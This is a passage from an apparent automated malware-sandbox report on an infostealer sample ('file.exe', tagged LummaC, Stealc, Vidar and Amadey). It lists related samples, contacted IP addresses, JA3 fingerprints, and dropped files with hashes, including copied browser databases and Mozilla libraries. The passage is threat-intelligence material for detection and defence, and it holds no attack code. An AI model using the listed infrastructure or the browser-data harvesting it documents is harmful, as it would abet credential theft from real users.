                                                                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                                                                                                • 185.215.113.16
                                                                                                                                                                                                                                                file.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                                                                                                • 185.215.113.206
                                                                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                                                                                                • 185.215.113.16

                                                                                                                                                                                                                                                JA3 Fingerprints

                                                                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                28a2c9bd18a11de089ef85a160da29e4http://dse_NA4@docusign.netGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                • 20.190.159.73
                                                                                                                                                                                                                                                • 52.149.20.212
                                                                                                                                                                                                                                                • 184.28.90.27
                                                                                                                                                                                                                                                • 13.107.246.45
                                                                                                                                                                                                                                                Everything.exeGet hashmaliciousSilverRatBrowse
                                                                                                                                                                                                                                                • 20.190.159.73
                                                                                                                                                                                                                                                • 52.149.20.212
                                                                                                                                                                                                                                                • 184.28.90.27
                                                                                                                                                                                                                                                • 13.107.246.45
                                                                                                                                                                                                                                                EAAntiCheat.Services.exeGet hashmaliciousSilverRatBrowse
                                                                                                                                                                                                                                                • 20.190.159.73
                                                                                                                                                                                                                                                • 52.149.20.212
                                                                                                                                                                                                                                                • 184.28.90.27
                                                                                                                                                                                                                                                • 13.107.246.45
                                                                                                                                                                                                                                                http://swctch.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                • 20.190.159.73
                                                                                                                                                                                                                                                • 52.149.20.212
                                                                                                                                                                                                                                                • 184.28.90.27
                                                                                                                                                                                                                                                • 13.107.246.45
                                                                                                                                                                                                                                                https://henrybodmerabeggco.wordpress.com/abegg-co-ag-proposal/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                • 20.190.159.73
                                                                                                                                                                                                                                                • 52.149.20.212
                                                                                                                                                                                                                                                • 184.28.90.27
                                                                                                                                                                                                                                                • 13.107.246.45
                                                                                                                                                                                                                                                SWIFTCOPY202973783.vbeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                                                • 20.190.159.73
                                                                                                                                                                                                                                                • 52.149.20.212
                                                                                                                                                                                                                                                • 184.28.90.27
                                                                                                                                                                                                                                                • 13.107.246.45
                                                                                                                                                                                                                                                https://topnews.si/revive-adserver/www/delivery/ck.php?ct=1&oaparams=2bannerid=2zoneid=15cb=1215afdebfoadest=https://trunitrisnionw.org/tripmail/treat.html#glenn.turley@steptoe-johnson.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                • 20.190.159.73
                                                                                                                                                                                                                                                • 52.149.20.212
                                                                                                                                                                                                                                                • 184.28.90.27
                                                                                                                                                                                                                                                • 13.107.246.45
                                                                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                • 20.190.159.73
                                                                                                                                                                                                                                                • 52.149.20.212
                                                                                                                                                                                                                                                • 184.28.90.27
                                                                                                                                                                                                                                                • 13.107.246.45
                                                                                                                                                                                                                                                Ref#130709.vbeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                                                                                • 20.190.159.73
                                                                                                                                                                                                                                                • 52.149.20.212
                                                                                                                                                                                                                                                • 184.28.90.27
                                                                                                                                                                                                                                                • 13.107.246.45
                                                                                                                                                                                                                                                https://reviewfile.z13.web.core.windows.net/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                • 20.190.159.73
                                                                                                                                                                                                                                                • 52.149.20.212
                                                                                                                                                                                                                                                • 184.28.90.27
                                                                                                                                                                                                                                                • 13.107.246.45
                                                                                                                                                                                                                                                a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                • 188.114.96.3
                                                                                                                                                                                                                                                • 23.192.247.89
                                                                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                                                                                                • 188.114.96.3
                                                                                                                                                                                                                                                • 23.192.247.89
                                                                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                • 188.114.96.3
                                                                                                                                                                                                                                                • 23.192.247.89
                                                                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                                                                                                • 188.114.96.3
                                                                                                                                                                                                                                                • 23.192.247.89
                                                                                                                                                                                                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                • 188.114.96.3
                                                                                                                                                                                                                                                • 23.192.247.89
                                                                                                                                                                                                                                                file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                • 188.114.96.3
                                                                                                                                                                                                                                                • 23.192.247.89
                                                                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                                                                                                • 188.114.96.3
                                                                                                                                                                                                                                                • 23.192.247.89
                                                                                                                                                                                                                                                90876654545.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                                                                                                                                                • 188.114.96.3
                                                                                                                                                                                                                                                • 23.192.247.89
                                                                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                                                                                                • 188.114.96.3
                                                                                                                                                                                                                                                • 23.192.247.89
                                                                                                                                                                                                                                                file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                • 188.114.96.3
                                                                                                                                                                                                                                                • 23.192.247.89

                                                                                                                                                                                                                                                Dropped Files

                                                                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                C:\ProgramData\freebl3.dllfile.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                  file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                    file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                          file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                              file.exeGet hashmaliciousAmadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                  file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                    C:\ProgramData\mozglue.dllfile.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                      file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                        file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                          file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                                  file.exeGet hashmaliciousAmadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                                    file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                                      file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse

                                                                                                                                                                                                                                                                                        Created / dropped Files

                                                                                                                                                                                                                                                                                        C:\ProgramData\AFCFHJJE

                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                        Size (bytes):106496
                                                                                                                                                                                                                                                                                        Entropy (8bit):1.1358696453229276
                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                                                                                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                                                                                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                                                                                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                                                                                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                        C:\ProgramData\DHIECGCAEBFIIDHIDGIE

                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1809), with CRLF line terminators
                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                        Size (bytes):9571
                                                                                                                                                                                                                                                                                        Entropy (8bit):5.536643647658967
                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                        SSDEEP:192:qnaRt+YbBp6ihj4qyaaX86KKkfGNBw8DJSl:yegqumcwQ0
                                                                                                                                                                                                                                                                                        MD5:5D8E5D85E880FB2D153275FCBE9DA6E5
                                                                                                                                                                                                                                                                                        SHA1:72332A8A92B77A8B1E3AA00893D73FC2704B0D13
                                                                                                                                                                                                                                                                                        SHA-256:50490DC0D0A953FA7D5E06105FE9676CDB9B49C399688068541B19DD911B90F9
                                                                                                                                                                                                                                                                                        SHA-512:57441B4CCBA58F557E08AAA0918D1F9AC36D0AF6F6EB3D3C561DA7953ED156E89857FFB829305F65D220AE1075BC825F131D732B589B5844C82CA90B53AAF4EE
                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                        Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "57f16a19-e119-4073-bf01-28f88011f783");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696333830);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696333856);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

                                                                                                                                                                                                                                                                                        C:\ProgramData\EHJDHJKFIECAAKFIJJKJKFHJKE

                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                                                        File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                        Size (bytes):5242880
                                                                                                                                                                                                                                                                                        Entropy (8bit):0.037963276276857943
                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                        SSDEEP:192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
                                                                                                                                                                                                                                                                                        MD5:C0FDF21AE11A6D1FA1201D502614B622
                                                                                                                                                                                                                                                                                        SHA1:11724034A1CC915B061316A96E79E9DA6A00ADE8
                                                                                                                                                                                                                                                                                        SHA-256:FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
                                                                                                                                                                                                                                                                                        SHA-512:A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                        Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                        C:\ProgramData\GHDHDBAECGCAFHJJDAKF

                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                        Size (bytes):49152
                                                                                                                                                                                                                                                                                        Entropy (8bit):0.8180424350137764
                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                        SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                                                                                                                                        MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                                                                                                                                        SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                                                                                                                                        SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                                                                                                                                        SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                        C:\ProgramData\JECGIIID

                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                        Size (bytes):114688
                                                                                                                                                                                                                                                                                        Entropy (8bit):0.9746603542602881
                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                                                                                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                                                                                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                                                                                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                                                                                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                        C:\ProgramData\JECGIIIDAKJDHJKFHIEBFCGHCG

                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                                                        File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                        Size (bytes):98304
                                                                                                                                                                                                                                                                                        Entropy (8bit):0.08235737944063153
                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                        SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                                                                                                                                                        MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                                                                                                                                                        SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                                                                                                                                                        SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                                                                                                                                                        SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                        C:\ProgramData\KFIDBAFHCAKFBGCBFHIJ

                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                        Size (bytes):40960
                                                                                                                                                                                                                                                                                        Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_crypted.exe_93ec97f94e7ee6995da0c103af67d012cdae7d_452b3ea7_acf2c5a3-18a7-4997-924e-1e829badd994\Report.wer

                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                        Size (bytes):65536
                                                                                                                                                                                                                                                                                        Entropy (8bit):0.7117412183013748
                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                        SSDEEP:96:s0FFVsrNVxsAhdlo07RT6tQXIDcQzc6rcEqcw3MX+HbHg/8BRTf3Oy1FhZAX/d55:dwNVxP90Nvw48ju1zuiFUZ24IO8r
                                                                                                                                                                                                                                                                                        MD5:0E261CFDD776F7861E4A9D7D5C500C82
                                                                                                                                                                                                                                                                                        SHA1:74E4DB67753479937CF49780687ECDB0698065E7
                                                                                                                                                                                                                                                                                        SHA-256:499864ACCACBD21040D49C90D15CDCECD0EF153A0081B628A01560C49DB19D82
                                                                                                                                                                                                                                                                                        SHA-512:A1E3358E40E14E4436245AD7EC2A8028E9C5CAF4A89F1C99F74055135D95C88576C3B3D6CC2010F44447C7BF2E2D7302DDDC675B02BAECD65F6586106E970AE3
                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.5.8.1.3.0.3.9.8.8.3.6.1.7.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.5.8.1.3.0.4.0.6.4.9.2.3.7.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.c.f.2.c.5.a.3.-.1.8.a.7.-.4.9.9.7.-.9.2.4.e.-.1.e.8.2.9.b.a.d.d.9.9.4.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.9.4.e.d.d.b.8.-.c.2.d.5.-.4.8.6.7.-.b.8.1.2.-.b.d.a.b.6.1.8.e.c.d.e.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.c.r.y.p.t.e.d...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.4.c.0.-.0.0.0.1.-.0.0.1.4.-.5.0.f.7.-.7.2.9.5.4.f.3.4.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.a.7.b.9.0.9.0.a.e.a.b.c.0.5.f.3.8.f.2.3.3.9.8.c.e.7.d.9.a.2.d.5.0.0.0.0.f.f.f.f.!.0.0.0.0.a.5.a.c.4.5.1.5.6.f.3.b.f.e.9.5.9.c.0.a.a.5.6.8.7.1.f.5.3.a.5.1.a.d.1.6.3.b.3.d.!.c.r.y.p.t.e.d...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.

                                                                                                                                                                                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER493B.tmp.dmp

                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                        File Type:Mini DuMP crash report, 14 streams, Mon Nov 11 15:37:20 2024, 0x1205a4 type
                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                        Size (bytes):43950
                                                                                                                                                                                                                                                                                        Entropy (8bit):1.7779379203115677
                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                        SSDEEP:96:5w8MpXF6If3wLjxIg6FYaMi73wg2GDMjgG3idjnzyE8Nn6mXM5GjNvxlJWIkWI0z:xuX0TuFeOL43QyE8NlM6bTL2Koo9riQ
                                                                                                                                                                                                                                                                                        MD5:6476D763EECDE68462317FB38CE1E0DD
                                                                                                                                                                                                                                                                                        SHA1:A31D463F44B4CFEDD97F99C1A1BE71D15452DA3C
                                                                                                                                                                                                                                                                                        SHA-256:CFBE568A5C776D850AE15D5F0696D6A1E4725583235BCD76DBB741C8365B33AE
                                                                                                                                                                                                                                                                                        SHA-512:0E08062B1534C51B163285F7CC03EF5B05A68B6B75C4CFB3C49F5546DC4292E98EE9DA97410FD987A2EC44DDE9EE0BE73EC914F798091D8801DA6FA5FA10A455
                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                        Preview:MDMP..a..... ........$2g........................X...............P ..........T.......8...........T...........................$...........................................................................................eJ..............GenuineIntel............T............$2g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER49D8.tmp.WERInternalMetadata.xml

                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                        Size (bytes):8374
                                                                                                                                                                                                                                                                                        Entropy (8bit):3.694734681390788
                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                        SSDEEP:192:R6l7wVeJIb6er6Y+r6LgmfCiQ8prw89bk3sf0SMm:R6lXJ06er6Yq6LgmfBjk8fh
                                                                                                                                                                                                                                                                                        MD5:805179A522090D38077A3AC898AE2880
                                                                                                                                                                                                                                                                                        SHA1:E3F708A3F8FBFC7BE50ECFB2FA047FDA8EC719AB
                                                                                                                                                                                                                                                                                        SHA-256:AD89160EF1FCCC8EC89CE0853BB93AF74AD6FA6A166AABC27B9DBFACEB92ADF4
                                                                                                                                                                                                                                                                                        SHA-512:C5E6AD614A71A357418B9C3CAA42A7B5A35BB5C97C027F29D94955B038DDE63EB642ECF7AE2620450DFA6FC2BDFF32AE19522CB07491ACFA6303DE1EF074ACDA
                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.2.1.6.<./.P.i.

                                                                                                                                                                                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER4A28.tmp.xml

                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                        Size (bytes):4705
                                                                                                                                                                                                                                                                                        Entropy (8bit):4.463573992842332
                                                                                                                                                                                                                                                                                        Encrypted:false
